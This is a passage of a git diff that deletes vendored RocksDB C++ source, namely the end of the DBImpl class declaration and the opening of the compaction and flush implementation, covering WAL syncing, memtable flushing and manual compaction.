-  //  the write_thread_ without using mutex
-  //  - it follows that the items with getting_synced=true can be safely read
-  //  from the same thread that has set getting_synced=true
-  std::deque<LogWriterNumber> logs_;
-  // Signaled when getting_synced becomes false for some of the logs_.
-  InstrumentedCondVar log_sync_cv_;
-  std::atomic<uint64_t> total_log_size_;
-  // only used for dynamically adjusting max_total_wal_size. it is a sum of
-  // [write_buffer_size * max_write_buffer_number] over all column families
-  uint64_t max_total_in_memory_state_;
-  // If true, we have only one (default) column family. We use this to optimize
-  // some code-paths
-  bool single_column_family_mode_;
-  // If this is non-empty, we need to delete these log files in background
-  // threads. Protected by db mutex.
-  autovector<log::Writer*> logs_to_free_;
-
-  bool is_snapshot_supported_;
-
-  // Class to maintain directories for all database paths other than main one.
-  class Directories {
-   public:
-    Status SetDirectories(Env* env, const std::string& dbname,
-                          const std::string& wal_dir,
-                          const std::vector<DbPath>& data_paths);
-
-    Directory* GetDataDir(size_t path_id);
-
-    Directory* GetWalDir() {
-      if (wal_dir_) {
-        return wal_dir_.get();
-      }
-      return db_dir_.get();
-    }
-
-    Directory* GetDbDir() { return db_dir_.get(); }
-
-   private:
-    std::unique_ptr<Directory> db_dir_;
-    std::vector<std::unique_ptr<Directory>> data_dirs_;
-    std::unique_ptr<Directory> wal_dir_;
-
-    Status CreateAndNewDirectory(Env* env, const std::string& dirname,
-                                 std::unique_ptr<Directory>* directory) const;
-  };
-
-  Directories directories_;
-
-  WriteBufferManager* write_buffer_manager_;
-
-  WriteThread write_thread_;
-  WriteBatch tmp_batch_;
-  // The write thread when the writers have no memtable write. This will be used
-  // in 2PC to batch the prepares separately from the serial commit.
-  WriteThread nonmem_write_thread_;
-
-  WriteController write_controller_;
-
-  unique_ptr<RateLimiter> low_pri_write_rate_limiter_;
-
-  // Size of the last batch group. In slowdown mode, next write needs to
-  // sleep if it uses up the quota.
-  // Note: This is to protect memtable and compaction. If the batch only writes
-  // to the WAL its size need not to be included in this.
-  uint64_t last_batch_group_size_;
-
-  FlushScheduler flush_scheduler_;
-
-  SnapshotList snapshots_;
-
-  // For each background job, pending_outputs_ keeps the current file number at
-  // the time that background job started.
-  // FindObsoleteFiles()/PurgeObsoleteFiles() never deletes any file that has
-  // number bigger than any of the file number in pending_outputs_. Since file
-  // numbers grow monotonically, this also means that pending_outputs_ is always
-  // sorted. After a background job is done executing, its file number is
-  // deleted from pending_outputs_, which allows PurgeObsoleteFiles() to clean
-  // it up.
-  // State is protected with db mutex.
-  std::list<uint64_t> pending_outputs_;
-
-  // PurgeFileInfo is a structure to hold information of files to be deleted in
-  // purge_queue_
-  struct PurgeFileInfo {
-    std::string fname;
-    FileType type;
-    uint64_t number;
-    uint32_t path_id;
-    int job_id;
-    PurgeFileInfo(std::string fn, FileType t, uint64_t num, uint32_t pid,
-                  int jid)
-        : fname(fn), type(t), number(num), path_id(pid), job_id(jid) {}
-  };
-
-  // flush_queue_ and compaction_queue_ hold column families that we need to
-  // flush and compact, respectively.
-  // A column family is inserted into flush_queue_ when it satisfies condition
-  // cfd->imm()->IsFlushPending()
-  // A column family is inserted into compaction_queue_ when it satisfied
-  // condition cfd->NeedsCompaction()
-  // Column families in this list are all Ref()-erenced
-  // TODO(icanadi) Provide some kind of ReferencedColumnFamily class that will
-  // do RAII on ColumnFamilyData
-  // Column families are in this queue when they need to be flushed or
-  // compacted. Consumers of these queues are flush and compaction threads. When
-  // column family is put on this queue, we increase unscheduled_flushes_ and
-  // unscheduled_compactions_. When these variables are bigger than zero, that
-  // means we need to schedule background threads for compaction and thread.
-  // Once the background threads are scheduled, we decrease unscheduled_flushes_
-  // and unscheduled_compactions_. That way we keep track of number of
-  // compaction and flush threads we need to schedule. This scheduling is done
-  // in MaybeScheduleFlushOrCompaction()
-  // invariant(column family present in flush_queue_ <==>
-  // ColumnFamilyData::pending_flush_ == true)
-  std::deque<ColumnFamilyData*> flush_queue_;
-  // invariant(column family present in compaction_queue_ <==>
-  // ColumnFamilyData::pending_compaction_ == true)
-  std::deque<ColumnFamilyData*> compaction_queue_;
-
-  // A queue to store filenames of the files to be purged
-  std::deque<PurgeFileInfo> purge_queue_;
-
-  // A queue to store log writers to close
-  std::deque<log::Writer*> logs_to_free_queue_;
-  int unscheduled_flushes_;
-  int unscheduled_compactions_;
-
-  // count how many background compactions are running or have been scheduled in
-  // the BOTTOM pool
-  int bg_bottom_compaction_scheduled_;
-
-  // count how many background compactions are running or have been scheduled
-  int bg_compaction_scheduled_;
-
-  // stores the number of compactions are currently running
-  int num_running_compactions_;
-
-  // number of background memtable flush jobs, submitted to the HIGH pool
-  int bg_flush_scheduled_;
-
-  // stores the number of flushes are currently running
-  int num_running_flushes_;
-
-  // number of background obsolete file purge jobs, submitted to the HIGH pool
-  int bg_purge_scheduled_;
-
-  // Information for a manual compaction
-  struct ManualCompactionState {
-    ColumnFamilyData* cfd;
-    int input_level;
-    int output_level;
-    uint32_t output_path_id;
-    Status status;
-    bool done;
-    bool in_progress;             // compaction request being processed?
-    bool incomplete;              // only part of requested range compacted
-    bool exclusive;               // current behavior of only one manual
-    bool disallow_trivial_move;   // Force actual compaction to run
-    const InternalKey* begin;     // nullptr means beginning of key range
-    const InternalKey* end;       // nullptr means end of key range
-    InternalKey* manual_end;      // how far we are compacting
-    InternalKey tmp_storage;      // Used to keep track of compaction progress
-    InternalKey tmp_storage1;     // Used to keep track of compaction progress
-  };
-  struct PrepickedCompaction {
-    // background compaction takes ownership of `compaction`.
-    Compaction* compaction;
-    // caller retains ownership of `manual_compaction_state` as it is reused
-    // across background compactions.
-    ManualCompactionState* manual_compaction_state;  // nullptr if non-manual
-  };
-  std::deque<ManualCompactionState*> manual_compaction_dequeue_;
-
-  struct CompactionArg {
-    // caller retains ownership of `db`.
-    DBImpl* db;
-    // background compaction takes ownership of `prepicked_compaction`.
-    PrepickedCompaction* prepicked_compaction;
-  };
-
-  // Have we encountered a background error in paranoid mode?
-  Status bg_error_;
-
-  // shall we disable deletion of obsolete files
-  // if 0 the deletion is enabled.
-  // if non-zero, files will not be getting deleted
-  // This enables two different threads to call
-  // EnableFileDeletions() and DisableFileDeletions()
-  // without any synchronization
-  int disable_delete_obsolete_files_;
-
-  // last time when DeleteObsoleteFiles with full scan was executed. Originaly
-  // initialized with startup time.
-  uint64_t delete_obsolete_files_last_run_;
-
-  // last time stats were dumped to LOG
-  std::atomic<uint64_t> last_stats_dump_time_microsec_;
-
-  // Each flush or compaction gets its own job id. this counter makes sure
-  // they're unique
-  std::atomic<int> next_job_id_;
-
-  // A flag indicating whether the current rocksdb database has any
-  // data that is not yet persisted into either WAL or SST file.
-  // Used when disableWAL is true.
-  std::atomic<bool> has_unpersisted_data_;
-
-  // if an attempt was made to flush all column families that
-  // the oldest log depends on but uncommited data in the oldest
-  // log prevents the log from being released.
-  // We must attempt to free the dependent memtables again
-  // at a later time after the transaction in the oldest
-  // log is fully commited.
-  bool unable_to_flush_oldest_log_;
-
-  static const int KEEP_LOG_FILE_NUM = 1000;
-  // MSVC version 1800 still does not have constexpr for ::max()
-  static const uint64_t kNoTimeOut = port::kMaxUint64;
-
-  std::string db_absolute_path_;
-
-  // The options to access storage files
-  const EnvOptions env_options_;
-
-  // Number of running IngestExternalFile() calls.
-  // REQUIRES: mutex held
-  int num_running_ingest_file_;
-
-#ifndef ROCKSDB_LITE
-  WalManager wal_manager_;
-#endif  // ROCKSDB_LITE
-
-  // Unified interface for logging events
-  EventLogger event_logger_;
-
-  // A value of > 0 temporarily disables scheduling of background work
-  int bg_work_paused_;
-
-  // A value of > 0 temporarily disables scheduling of background compaction
-  int bg_compaction_paused_;
-
-  // Guard against multiple concurrent refitting
-  bool refitting_level_;
-
-  // Indicate DB was opened successfully
-  bool opened_successfully_;
-
-  // minimum log number still containing prepared data.
-  // this is used by FindObsoleteFiles to determine which
-  // flushed logs we must keep around because they still
-  // contain prepared data which has not been flushed or rolled back
-  std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
-      min_log_with_prep_;
-
-  // to be used in conjunction with min_log_with_prep_.
-  // once a transaction with data in log L is committed or rolled back
-  // rather than removing the value from the heap we add that value
-  // to prepared_section_completed_ which maps LOG -> instance_count
-  // since a log could contain multiple prepared sections
-  //
-  // when trying to determine the minimum log still active we first
-  // consult min_log_with_prep_. while that root value maps to
-  // a value > 0 in prepared_section_completed_ we decrement the
-  // instance_count for that log and pop the root value in
-  // min_log_with_prep_. This will work the same as a min_heap
-  // where we are deleteing arbitrary elements and the up heaping.
-  std::unordered_map<uint64_t, uint64_t> prepared_section_completed_;
-  std::mutex prep_heap_mutex_;
-
-  // No copying allowed
-  DBImpl(const DBImpl&);
-  void operator=(const DBImpl&);
-
-  // Background threads call this function, which is just a wrapper around
-  // the InstallSuperVersion() function. Background threads carry
-  // job_context which can have new_superversion already
-  // allocated.
-  void InstallSuperVersionAndScheduleWorkWrapper(
-      ColumnFamilyData* cfd, JobContext* job_context,
-      const MutableCFOptions& mutable_cf_options);
-
-  // All ColumnFamily state changes go through this function. Here we analyze
-  // the new state and we schedule background work if we detect that the new
-  // state needs flush or compaction.
-  SuperVersion* InstallSuperVersionAndScheduleWork(
-      ColumnFamilyData* cfd, SuperVersion* new_sv,
-      const MutableCFOptions& mutable_cf_options);
-
-#ifndef ROCKSDB_LITE
-  using DB::GetPropertiesOfAllTables;
-  virtual Status GetPropertiesOfAllTables(ColumnFamilyHandle* column_family,
-                                          TablePropertiesCollection* props)
-      override;
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) override;
-
-#endif  // ROCKSDB_LITE
-
-  bool GetIntPropertyInternal(ColumnFamilyData* cfd,
-                              const DBPropertyInfo& property_info,
-                              bool is_locked, uint64_t* value);
-
-  bool HasPendingManualCompaction();
-  bool HasExclusiveManualCompaction();
-  void AddManualCompaction(ManualCompactionState* m);
-  void RemoveManualCompaction(ManualCompactionState* m);
-  bool ShouldntRunManualCompaction(ManualCompactionState* m);
-  bool HaveManualCompaction(ColumnFamilyData* cfd);
-  bool MCOverlap(ManualCompactionState* m, ManualCompactionState* m1);
-
-  size_t GetWalPreallocateBlockSize(uint64_t write_buffer_size) const;
-
-  // When set, we use a seprate queue for writes that dont write to memtable. In
-  // 2PC these are the writes at Prepare phase.
-  const bool concurrent_prepare_;
-  const bool manual_wal_flush_;
-};
-
-extern Options SanitizeOptions(const std::string& db,
-                               const Options& src);
-
-extern DBOptions SanitizeOptions(const std::string& db, const DBOptions& src);
-
-extern CompressionType GetCompressionFlush(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options);
-
-// Fix user-supplied options to be reasonable
-template <class T, class V>
-static void ClipToRange(T* ptr, V minvalue, V maxvalue) {
-  if (static_cast<V>(*ptr) > maxvalue) *ptr = maxvalue;
-  if (static_cast<V>(*ptr) < minvalue) *ptr = minvalue;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_compaction_flush.cc b/thirdparty/rocksdb/db/db_impl_compaction_flush.cc
deleted file mode 100644
index 3e686fe..0000000
--- a/thirdparty/rocksdb/db/db_impl_compaction_flush.cc
+++ /dev/null
@@ -1,1910 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-
-#include "db/builder.h"
-#include "db/event_helpers.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-Status DBImpl::SyncClosedLogs(JobContext* job_context) {
-  TEST_SYNC_POINT("DBImpl::SyncClosedLogs:Start");
-  mutex_.AssertHeld();
-  autovector<log::Writer*, 1> logs_to_sync;
-  uint64_t current_log_number = logfile_number_;
-  while (logs_.front().number < current_log_number &&
-         logs_.front().getting_synced) {
-    log_sync_cv_.Wait();
-  }
-  for (auto it = logs_.begin();
-       it != logs_.end() && it->number < current_log_number; ++it) {
-    auto& log = *it;
-    assert(!log.getting_synced);
-    log.getting_synced = true;
-    logs_to_sync.push_back(log.writer);
-  }
-
-  Status s;
-  if (!logs_to_sync.empty()) {
-    mutex_.Unlock();
-
-    for (log::Writer* log : logs_to_sync) {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "[JOB %d] Syncing log #%" PRIu64, job_context->job_id,
-                     log->get_log_number());
-      s = log->file()->Sync(immutable_db_options_.use_fsync);
-    }
-    if (s.ok()) {
-      s = directories_.GetWalDir()->Fsync();
-    }
-
-    mutex_.Lock();
-
-    // "number <= current_log_number - 1" is equivalent to
-    // "number < current_log_number".
-    MarkLogsSynced(current_log_number - 1, true, s);
-    if (!s.ok()) {
-      Status new_bg_error = s;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kFlush,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;
-      }
-      TEST_SYNC_POINT("DBImpl::SyncClosedLogs:Failed");
-      return s;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::FlushMemTableToOutputFile(
-    ColumnFamilyData* cfd, const MutableCFOptions& mutable_cf_options,
-    bool* made_progress, JobContext* job_context, LogBuffer* log_buffer) {
-  mutex_.AssertHeld();
-  assert(cfd->imm()->NumNotFlushed() != 0);
-  assert(cfd->imm()->IsFlushPending());
-
-  SequenceNumber earliest_write_conflict_snapshot;
-  std::vector<SequenceNumber> snapshot_seqs =
-      snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-  FlushJob flush_job(
-      dbname_, cfd, immutable_db_options_, mutable_cf_options, env_options_,
-      versions_.get(), &mutex_, &shutting_down_, snapshot_seqs,
-      earliest_write_conflict_snapshot, job_context, log_buffer,
-      directories_.GetDbDir(), directories_.GetDataDir(0U),
-      GetCompressionFlush(*cfd->ioptions(), mutable_cf_options), stats_,
-      &event_logger_, mutable_cf_options.report_bg_io_stats);
-
-  FileMetaData file_meta;
-
-  flush_job.PickMemTable();
-
-#ifndef ROCKSDB_LITE
-  // may temporarily unlock and lock the mutex.
-  NotifyOnFlushBegin(cfd, &file_meta, mutable_cf_options, job_context->job_id,
-                     flush_job.GetTableProperties());
-#endif  // ROCKSDB_LITE
-
-  Status s;
-  if (logfile_number_ > 0 &&
-      versions_->GetColumnFamilySet()->NumberOfColumnFamilies() > 0) {
-    // If there are more than one column families, we need to make sure that
-    // all the log files except the most recent one are synced. Otherwise if
-    // the host crashes after flushing and before WAL is persistent, the
-    // flushed SST may contain data from write batches whose updates to
-    // other column families are missing.
-    // SyncClosedLogs() may unlock and re-lock the db_mutex.
-    s = SyncClosedLogs(job_context);
-  }
-
-  // Within flush_job.Run, rocksdb may call event listener to notify
-  // file creation and deletion.
-  //
-  // Note that flush_job.Run will unlock and lock the db_mutex,
-  // and EventListener callback will be called when the db_mutex
-  // is unlocked by the current thread.
-  if (s.ok()) {
-    s = flush_job.Run(&file_meta);
-  } else {
-    flush_job.Cancel();
-  }
-
-  if (s.ok()) {
-    InstallSuperVersionAndScheduleWorkWrapper(cfd, job_context,
-                                              mutable_cf_options);
-    if (made_progress) {
-      *made_progress = 1;
-    }
-    VersionStorageInfo::LevelSummaryStorage tmp;
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Level summary: %s\n",
-                     cfd->GetName().c_str(),
-                     cfd->current()->storage_info()->LevelSummary(&tmp));
-  }
-
-  if (!s.ok() && !s.IsShutdownInProgress() &&
-      immutable_db_options_.paranoid_checks && bg_error_.ok()) {
-    Status new_bg_error = s;
-    // may temporarily unlock and lock the mutex.
-    EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                          BackgroundErrorReason::kFlush,
-                                          &new_bg_error, &mutex_);
-    if (!new_bg_error.ok()) {
-      // if a bad error happened (not ShutdownInProgress), paranoid_checks is
-      // true, and the error isn't handled by callback, mark DB read-only
-      bg_error_ = new_bg_error;
-    }
-  }
-  if (s.ok()) {
-#ifndef ROCKSDB_LITE
-    // may temporarily unlock and lock the mutex.
-    NotifyOnFlushCompleted(cfd, &file_meta, mutable_cf_options,
-                           job_context->job_id, flush_job.GetTableProperties());
-    auto sfm = static_cast<SstFileManagerImpl*>(
-        immutable_db_options_.sst_file_manager.get());
-    if (sfm) {
-      // Notify sst_file_manager that a new file was added
-      std::string file_path = MakeTableFileName(
-          immutable_db_options_.db_paths[0].path, file_meta.fd.GetNumber());
-      sfm->OnAddFile(file_path);
-      if (sfm->IsMaxAllowedSpaceReached() && bg_error_.ok()) {
-        Status new_bg_error = Status::IOError("Max allowed space was reached");
-        TEST_SYNC_POINT_CALLBACK(
-            "DBImpl::FlushMemTableToOutputFile:MaxAllowedSpaceReached",
-            &new_bg_error);
-        // may temporarily unlock and lock the mutex.
-        EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                              BackgroundErrorReason::kFlush,
-                                              &new_bg_error, &mutex_);
-        if (!new_bg_error.ok()) {
-          bg_error_ = new_bg_error;
-        }
-      }
-    }
-#endif  // ROCKSDB_LITE
-  }
-  return s;
-}
-
-void DBImpl::NotifyOnFlushBegin(ColumnFamilyData* cfd, FileMetaData* file_meta,
-                                const MutableCFOptions& mutable_cf_options,
-                                int job_id, TableProperties prop) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  mutex_.AssertHeld();
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-  bool triggered_writes_slowdown =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_slowdown_writes_trigger);
-  bool triggered_writes_stop =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_stop_writes_trigger);
-  // release lock while notifying events
-  mutex_.Unlock();
-  {
-    FlushJobInfo info;
-    info.cf_name = cfd->GetName();
-    // TODO(yhchiang): make db_paths dynamic in case flush does not
-    //                 go to L0 in the future.
-    info.file_path = MakeTableFileName(immutable_db_options_.db_paths[0].path,
-                                       file_meta->fd.GetNumber());
-    info.thread_id = env_->GetThreadID();
-    info.job_id = job_id;
-    info.triggered_writes_slowdown = triggered_writes_slowdown;
-    info.triggered_writes_stop = triggered_writes_stop;
-    info.smallest_seqno = file_meta->smallest_seqno;
-    info.largest_seqno = file_meta->largest_seqno;
-    info.table_properties = prop;
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnFlushBegin(this, info);
-    }
-  }
-  mutex_.Lock();
-// no need to signal bg_cv_ as it will be signaled at the end of the
-// flush process.
-#endif  // ROCKSDB_LITE
-}
-
-void DBImpl::NotifyOnFlushCompleted(ColumnFamilyData* cfd,
-                                    FileMetaData* file_meta,
-                                    const MutableCFOptions& mutable_cf_options,
-                                    int job_id, TableProperties prop) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  mutex_.AssertHeld();
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-  bool triggered_writes_slowdown =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_slowdown_writes_trigger);
-  bool triggered_writes_stop =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_stop_writes_trigger);
-  // release lock while notifying events
-  mutex_.Unlock();
-  {
-    FlushJobInfo info;
-    info.cf_name = cfd->GetName();
-    // TODO(yhchiang): make db_paths dynamic in case flush does not
-    //                 go to L0 in the future.
-    info.file_path = MakeTableFileName(immutable_db_options_.db_paths[0].path,
-                                       file_meta->fd.GetNumber());
-    info.thread_id = env_->GetThreadID();
-    info.job_id = job_id;
-    info.triggered_writes_slowdown = triggered_writes_slowdown;
-    info.triggered_writes_stop = triggered_writes_stop;
-    info.smallest_seqno = file_meta->smallest_seqno;
-    info.largest_seqno = file_meta->largest_seqno;
-    info.table_properties = prop;
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnFlushCompleted(this, info);
-    }
-  }
-  mutex_.Lock();
-  // no need to signal bg_cv_ as it will be signaled at the end of the
-  // flush process.
-#endif  // ROCKSDB_LITE
-}
-
-Status DBImpl::CompactRange(const CompactRangeOptions& options,
-                            ColumnFamilyHandle* column_family,
-                            const Slice* begin, const Slice* end) {
-  if (options.target_path_id >= immutable_db_options_.db_paths.size()) {
-    return Status::InvalidArgument("Invalid target path ID");
-  }
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  bool exclusive = options.exclusive_manual_compaction;
-
-  Status s = FlushMemTable(cfd, FlushOptions());
-  if (!s.ok()) {
-    LogFlush(immutable_db_options_.info_log);
-    return s;
-  }
-
-  int max_level_with_files = 0;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    Version* base = cfd->current();
-    for (int level = 1; level < base->storage_info()->num_non_empty_levels();
-         level++) {
-      if (base->storage_info()->OverlapInLevel(level, begin, end)) {
-        max_level_with_files = level;
-      }
-    }
-  }
-
-  int final_output_level = 0;
-  if (cfd->ioptions()->compaction_style == kCompactionStyleUniversal &&
-      cfd->NumberLevels() > 1) {
-    // Always compact all files together.
-    final_output_level = cfd->NumberLevels() - 1;
-    // if bottom most level is reserved
-    if (immutable_db_options_.allow_ingest_behind) {
-      final_output_level--;
-    }
-    s = RunManualCompaction(cfd, ColumnFamilyData::kCompactAllLevels,
-                            final_output_level, options.target_path_id,
-                            begin, end, exclusive);
-  } else {
-    for (int level = 0; level <= max_level_with_files; level++) {
-      int output_level;
-      // in case the compaction is universal or if we're compacting the
-      // bottom-most level, the output level will be the same as input one.
-      // level 0 can never be the bottommost level (i.e. if all files are in
-      // level 0, we will compact to level 1)
-      if (cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-          cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-        output_level = level;
-      } else if (level == max_level_with_files && level > 0) {
-        if (options.bottommost_level_compaction ==
-            BottommostLevelCompaction::kSkip) {
-          // Skip bottommost level compaction
-          continue;
-        } else if (options.bottommost_level_compaction ==
-                       BottommostLevelCompaction::kIfHaveCompactionFilter &&
-                   cfd->ioptions()->compaction_filter == nullptr &&
-                   cfd->ioptions()->compaction_filter_factory == nullptr) {
-          // Skip bottommost level compaction since we don't have a compaction
-          // filter
-          continue;
-        }
-        output_level = level;
-      } else {
-        output_level = level + 1;
-        if (cfd->ioptions()->compaction_style == kCompactionStyleLevel &&
-            cfd->ioptions()->level_compaction_dynamic_level_bytes &&
-            level == 0) {
-          output_level = ColumnFamilyData::kCompactToBaseLevel;
-        }
-      }
-      s = RunManualCompaction(cfd, level, output_level, options.target_path_id,
-                              begin, end, exclusive);
-      if (!s.ok()) {
-        break;
-      }
-      if (output_level == ColumnFamilyData::kCompactToBaseLevel) {
-        final_output_level = cfd->NumberLevels() - 1;
-      } else if (output_level > final_output_level) {
-        final_output_level = output_level;
-      }
-      TEST_SYNC_POINT("DBImpl::RunManualCompaction()::1");
-      TEST_SYNC_POINT("DBImpl::RunManualCompaction()::2");
-    }
-  }
-  if (!s.ok()) {
-    LogFlush(immutable_db_options_.info_log);
-    return s;
-  }
-
-  if (options.change_level) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[RefitLevel] waiting for background threads to stop");
-    s = PauseBackgroundWork();
-    if (s.ok()) {
-      s = ReFitLevel(cfd, final_output_level, options.target_level);
-    }
-    ContinueBackgroundWork();
-  }
-  LogFlush(immutable_db_options_.info_log);
-
-  {
-    InstrumentedMutexLock l(&mutex_);
-    // an automatic compaction that has been scheduled might have been
-    // preempted by the manual compactions. Need to schedule it back.
-    MaybeScheduleFlushOrCompaction();
-  }
-
-  return s;
-}
-
-Status DBImpl::CompactFiles(
-    const CompactionOptions& compact_options,
-    ColumnFamilyHandle* column_family,
-    const std::vector<std::string>& input_file_names,
-    const int output_level, const int output_path_id) {
-#ifdef ROCKSDB_LITE
-    // not supported in lite version
-  return Status::NotSupported("Not supported in ROCKSDB LITE");
-#else
-  if (column_family == nullptr) {
-    return Status::InvalidArgument("ColumnFamilyHandle must be non-null.");
-  }
-
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  assert(cfd);
-
-  Status s;
-  JobContext job_context(0, true);
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL,
-                       immutable_db_options_.info_log.get());
-
-  // Perform CompactFiles
-  SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-  {
-    InstrumentedMutexLock l(&mutex_);
-
-    // This call will unlock/lock the mutex to wait for current running
-    // IngestExternalFile() calls to finish.
-    WaitForIngestFile();
-
-    s = CompactFilesImpl(compact_options, cfd, sv->current,
-                         input_file_names, output_level,
-                         output_path_id, &job_context, &log_buffer);
-  }
-  if (sv->Unref()) {
-    mutex_.Lock();
-    sv->Cleanup();
-    mutex_.Unlock();
-    delete sv;
-  }
-
-  // Find and delete obsolete files
-  {
-    InstrumentedMutexLock l(&mutex_);
-    // If !s.ok(), this means that Compaction failed. In that case, we want
-    // to delete all obsolete files we might have created and we force
-    // FindObsoleteFiles(). This is because job_context does not
-    // catch all created files if compaction failed.
-    FindObsoleteFiles(&job_context, !s.ok());
-  }  // release the mutex
-
-  // delete unnecessary files if any, this is done outside the mutex
-  if (job_context.HaveSomethingToDelete() || !log_buffer.IsEmpty()) {
-    // Have to flush the info logs before bg_compaction_scheduled_--
-    // because if bg_flush_scheduled_ becomes 0 and the lock is
-    // released, the deconstructor of DB can kick in and destroy all the
-    // states of DB so info_log might not be available after that point.
-    // It also applies to access other states that DB owns.
-    log_buffer.FlushBufferToLog();
-    if (job_context.HaveSomethingToDelete()) {
-      // no mutex is locked here.  No need to Unlock() and Lock() here.
-      PurgeObsoleteFiles(job_context);
-    }
-    job_context.Clean();
-  }
-
-  return s;
-#endif  // ROCKSDB_LITE
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::CompactFilesImpl(
-    const CompactionOptions& compact_options, ColumnFamilyData* cfd,
-    Version* version, const std::vector<std::string>& input_file_names,
-    const int output_level, int output_path_id, JobContext* job_context,
-    LogBuffer* log_buffer) {
-  mutex_.AssertHeld();
-
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return Status::ShutdownInProgress();
-  }
-
-  std::unordered_set<uint64_t> input_set;
-  for (auto file_name : input_file_names) {
-    input_set.insert(TableFileNameToNumber(file_name));
-  }
-
-  ColumnFamilyMetaData cf_meta;
-  // TODO(yhchiang): can directly use version here if none of the
-  // following functions call is pluggable to external developers.
-  version->GetColumnFamilyMetaData(&cf_meta);
-
-  if (output_path_id < 0) {
-    if (immutable_db_options_.db_paths.size() == 1U) {
-      output_path_id = 0;
-    } else {
-      return Status::NotSupported(
-          "Automatic output path selection is not "
-          "yet supported in CompactFiles()");
-    }
-  }
-
-  Status s = cfd->compaction_picker()->SanitizeCompactionInputFiles(
-      &input_set, cf_meta, output_level);
-  if (!s.ok()) {
-    return s;
-  }
-
-  std::vector<CompactionInputFiles> input_files;
-  s = cfd->compaction_picker()->GetCompactionInputsFromFileNumbers(
-      &input_files, &input_set, version->storage_info(), compact_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  for (auto inputs : input_files) {
-    if (cfd->compaction_picker()->AreFilesInCompaction(inputs.files)) {
-      return Status::Aborted(
-          "Some of the necessary compaction input "
-          "files are already being compacted");
-    }
-  }
-
-  // At this point, CompactFiles will be run.
-  bg_compaction_scheduled_++;
-
-  unique_ptr<Compaction> c;
-  assert(cfd->compaction_picker());
-  c.reset(cfd->compaction_picker()->CompactFiles(
-      compact_options, input_files, output_level, version->storage_info(),
-      *cfd->GetLatestMutableCFOptions(), output_path_id));
-  if (!c) {
-    return Status::Aborted("Another Level 0 compaction is running");
-  }
-  c->SetInputVersion(version);
-  // deletion compaction currently not allowed in CompactFiles.
-  assert(!c->deletion_compaction());
-
-  SequenceNumber earliest_write_conflict_snapshot;
-  std::vector<SequenceNumber> snapshot_seqs =
-      snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-  auto pending_outputs_inserted_elem =
-      CaptureCurrentFileNumberInPendingOutputs();
-
-  assert(is_snapshot_supported_ || snapshots_.empty());
-  CompactionJob compaction_job(
-      job_context->job_id, c.get(), immutable_db_options_, env_options_,
-      versions_.get(), &shutting_down_, log_buffer, directories_.GetDbDir(),
-      directories_.GetDataDir(c->output_path_id()), stats_, &mutex_, &bg_error_,
-      snapshot_seqs, earliest_write_conflict_snapshot, table_cache_,
-      &event_logger_, c->mutable_cf_options()->paranoid_file_checks,
-      c->mutable_cf_options()->report_bg_io_stats, dbname_,
-      nullptr);  // Here we pass a nullptr for CompactionJobStats because
-                 // CompactFiles does not trigger OnCompactionCompleted(),
-                 // which is the only place where CompactionJobStats is
-                 // returned.  The idea of not triggering OnCompationCompleted()
-                 // is that CompactFiles runs in the caller thread, so the user
-                 // should always know when it completes.  As a result, it makes
-                 // less sense to notify the users something they should already
-                 // know.
-                 //
-                 // In the future, if we would like to add CompactionJobStats
-                 // support for CompactFiles, we should have CompactFiles API
